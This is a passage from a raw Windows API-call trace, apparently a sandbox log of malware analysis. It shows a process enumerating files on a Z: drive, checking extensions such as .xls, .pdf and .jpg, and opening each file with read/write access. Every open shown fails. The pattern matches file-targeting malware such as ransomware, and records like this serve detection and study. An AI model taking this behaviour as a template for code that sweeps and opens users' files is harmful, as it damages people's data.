PathFindExtensionW (pszPath="Z:\\OxtG5eiXbm.xls") returned=".xls" [0176.638] CreateFileW (lpFileName="Z:\\OxtG5eiXbm.xls" (normalized: "z:\\oxtg5eixbm.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.641] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa2dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sAXOlTuEN.odt", cAlternateFileName="")) returned 1 [0176.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.641] PathFindExtensionW (pszPath="Z:\\sAXOlTuEN.odt") returned=".odt" [0176.647] CreateFileW (lpFileName="Z:\\sAXOlTuEN.odt" (normalized: "z:\\saxoltuen.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.648] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x185b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S1VrbK55Uey.bmp", cAlternateFileName="")) returned 1 [0176.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.649] PathFindExtensionW (pszPath="Z:\\S1VrbK55Uey.bmp") returned=".bmp" [0176.654] CreateFileW (lpFileName="Z:\\S1VrbK55Uey.bmp" (normalized: "z:\\s1vrbk55uey.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.657] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DWHuuMWix2.flv", cAlternateFileName="")) returned 1 [0176.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.657] PathFindExtensionW (pszPath="Z:\\DWHuuMWix2.flv") returned=".flv" [0176.662] CreateFileW (lpFileName="Z:\\DWHuuMWix2.flv" (normalized: "z:\\dwhuumwix2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.664] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUsEMWHFeMlUg8RpMG.ots", cAlternateFileName="")) returned 1 [0176.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.664] PathFindExtensionW (pszPath="Z:\\fUsEMWHFeMlUg8RpMG.ots") returned=".ots" [0176.669] CreateFileW (lpFileName="Z:\\fUsEMWHFeMlUg8RpMG.ots" (normalized: "z:\\fusemwhfemlug8rpmg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.672] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10386, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F4BCJQiL.ots", cAlternateFileName="")) returned 1 [0176.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.672] PathFindExtensionW (pszPath="Z:\\F4BCJQiL.ots") returned=".ots" [0176.677] CreateFileW (lpFileName="Z:\\F4BCJQiL.ots" (normalized: "z:\\f4bcjqil.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.680] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x796b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YizWtOq9sqniAiG.pptx", cAlternateFileName="")) returned 1 [0176.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.680] PathFindExtensionW (pszPath="Z:\\YizWtOq9sqniAiG.pptx") returned=".pptx" [0176.687] CreateFileW (lpFileName="Z:\\YizWtOq9sqniAiG.pptx" (normalized: "z:\\yizwtoq9sqniaig.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.690] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe324, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfTEIxbdxeH16.wav", cAlternateFileName="")) returned 1 [0176.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.690] PathFindExtensionW (pszPath="Z:\\SfTEIxbdxeH16.wav") returned=".wav" [0176.696] CreateFileW (lpFileName="Z:\\SfTEIxbdxeH16.wav" (normalized: "z:\\sfteixbdxeh16.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.698] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICn9FymqAtw6QQL.ppt", cAlternateFileName="")) returned 1 [0176.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.698] PathFindExtensionW (pszPath="Z:\\ICn9FymqAtw6QQL.ppt") returned=".ppt" [0176.703] CreateFileW (lpFileName="Z:\\ICn9FymqAtw6QQL.ppt" (normalized: "z:\\icn9fymqatw6qql.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.705] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7c37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ewbUbaNVSvHfRRfQfQLC.xls", cAlternateFileName="")) returned 1 [0176.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.706] PathFindExtensionW (pszPath="Z:\\ewbUbaNVSvHfRRfQfQLC.xls") returned=".xls" [0176.710] CreateFileW (lpFileName="Z:\\ewbUbaNVSvHfRRfQfQLC.xls" (normalized: "z:\\ewbubanvsvhfrrfqfqlc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.711] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6b5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="svuJsC.pdf", cAlternateFileName="")) returned 1 [0176.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.711] PathFindExtensionW (pszPath="Z:\\svuJsC.pdf") returned=".pdf" [0176.715] CreateFileW (lpFileName="Z:\\svuJsC.pdf" (normalized: "z:\\svujsc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.717] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x124eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gh4zJ.pps", cAlternateFileName="")) returned 1 [0176.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.717] PathFindExtensionW (pszPath="Z:\\gh4zJ.pps") returned=".pps" [0176.721] CreateFileW (lpFileName="Z:\\gh4zJ.pps" (normalized: "z:\\gh4zj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.722] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa869, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qys9GnLkOeS.odt", cAlternateFileName="")) returned 1 [0176.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.722] PathFindExtensionW (pszPath="Z:\\qys9GnLkOeS.odt") returned=".odt" [0176.726] CreateFileW (lpFileName="Z:\\qys9GnLkOeS.odt" (normalized: "z:\\qys9gnlkoes.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.729] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x592c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v4eytQpoJk.swf", cAlternateFileName="")) returned 1 [0176.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.729] PathFindExtensionW (pszPath="Z:\\v4eytQpoJk.swf") returned=".swf" [0176.734] CreateFileW (lpFileName="Z:\\v4eytQpoJk.swf" (normalized: "z:\\v4eytqpojk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.735] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8f30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="evMqhpDEt7CXv.mp3", cAlternateFileName="")) returned 1 [0176.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.735] PathFindExtensionW (pszPath="Z:\\evMqhpDEt7CXv.mp3") returned=".mp3" [0176.740] CreateFileW (lpFileName="Z:\\evMqhpDEt7CXv.mp3" (normalized: "z:\\evmqhpdet7cxv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.743] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pbnq0tEevfYiPYev3.flv", cAlternateFileName="")) returned 1 [0176.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.743] PathFindExtensionW (pszPath="Z:\\Pbnq0tEevfYiPYev3.flv") returned=".flv" [0176.747] CreateFileW (lpFileName="Z:\\Pbnq0tEevfYiPYev3.flv" (normalized: "z:\\pbnq0teevfyipyev3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0176.748] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13ae1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ofYpMQKf1RjCMx.wav", cAlternateFileName="")) returned 1 [0176.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.748] PathFindExtensionW (pszPath="Z:\\ofYpMQKf1RjCMx.wav") returned=".wav" [0176.753] CreateFileW (lpFileName="Z:\\ofYpMQKf1RjCMx.wav" (normalized: "z:\\ofypmqkf1rjcmx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.756] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L1fyabptENWoGXu.rtf", cAlternateFileName="")) returned 1 [0176.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.756] PathFindExtensionW (pszPath="Z:\\L1fyabptENWoGXu.rtf") returned=".rtf" [0176.760] CreateFileW (lpFileName="Z:\\L1fyabptENWoGXu.rtf" (normalized: "z:\\l1fyabptenwogxu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.762] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hoPVmBvF77.odt", cAlternateFileName="")) returned 1 [0176.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.762] PathFindExtensionW (pszPath="Z:\\hoPVmBvF77.odt") returned=".odt" [0176.766] CreateFileW (lpFileName="Z:\\hoPVmBvF77.odt" (normalized: "z:\\hopvmbvf77.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.769] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="umVoob.csv", cAlternateFileName="")) returned 1 [0176.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0176.769] PathFindExtensionW (pszPath="Z:\\umVoob.csv") returned=".csv" [0176.773] CreateFileW (lpFileName="Z:\\umVoob.csv" (normalized: "z:\\umvoob.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0176.774] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6596, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RyYcx2F2hgV.gif", cAlternateFileName="")) returned 1 [0176.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.774] PathFindExtensionW (pszPath="Z:\\RyYcx2F2hgV.gif") returned=".gif" [0176.778] CreateFileW (lpFileName="Z:\\RyYcx2F2hgV.gif" (normalized: "z:\\ryycx2f2hgv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.780] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhwQOJysH9.jpg", cAlternateFileName="")) returned 1 [0176.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0176.780] PathFindExtensionW (pszPath="Z:\\AhwQOJysH9.jpg") returned=".jpg" [0176.786] CreateFileW (lpFileName="Z:\\AhwQOJysH9.jpg" (normalized: "z:\\ahwqojysh9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0176.787] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eQwKBctI5AfYjbVKmqeN.ods", cAlternateFileName="")) returned 1 [0176.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0176.787] PathFindExtensionW (pszPath="Z:\\eQwKBctI5AfYjbVKmqeN.ods") returned=".ods" [0176.792] CreateFileW (lpFileName="Z:\\eQwKBctI5AfYjbVKmqeN.ods" (normalized: "z:\\eqwkbcti5afyjbvkmqen.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 